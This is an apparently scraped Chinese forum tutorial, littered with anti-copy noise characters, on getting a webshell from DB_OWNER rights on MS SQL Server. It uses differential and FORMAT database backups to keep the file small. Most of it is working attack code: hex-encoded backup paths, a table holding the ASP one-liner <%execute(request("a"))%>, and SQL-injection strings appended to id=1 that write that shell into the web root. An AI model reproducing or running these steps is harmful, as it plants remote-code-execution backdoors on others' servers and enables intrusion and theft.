DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

6 @) Z) M5 t' `; @1
2
3
) e/ l' y$ x: m4
# F' ]" s0 o5 H9 ?# c4 `* T declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
0 I$ j. c, e# a( [( o* uinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 _( g/ [3 V# u# E6 g* ]; Mdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
7 @) I! G; O/ f6 d
二利用完全FORMAT
& v4 _2 Y* T  i6 g加一个参数WITH FROMAT
1 b7 N# A& [* A& o  V有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

' i# C$ N; {) X0 p% ~" y: j1
) a. t4 l( x  C7 E4 a( p# M9 w$ a/ K2
: S9 X5 v, Z5 b- v0 S3
9 }% s- J5 L6 J5 a. T9 _# s3 I4
, I9 {3 N# h: m" L5 k( V! L/ { declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
  J2 n2 m# f/ }) F; j! icreate table [dbo].[xiaolu] ([cmd] [image]);
2 b1 t  B) l( ^2 ^* T3 o" Pinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
) W( L. s: u, b' A0 E3 u; F
  t% T  s( q9 Z$ Z9 {2 ~6 t1 m8 U6 S总的来说就是那么简单几句,下面以备份数据库model为例子
" [+ a- G7 R$ V1

: b$ g4 k  a" Y- }, l1
5 r# f; L4 x3 g id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
# `, p3 [2 R! g& I; \, y
& ~$ u, z* Q8 f2 i2

$ c. b, n. k7 I' o1
* x6 i! @# W$ K5 H2 @ id=1;backup database model to disk='你的路径‘ with differential,format;--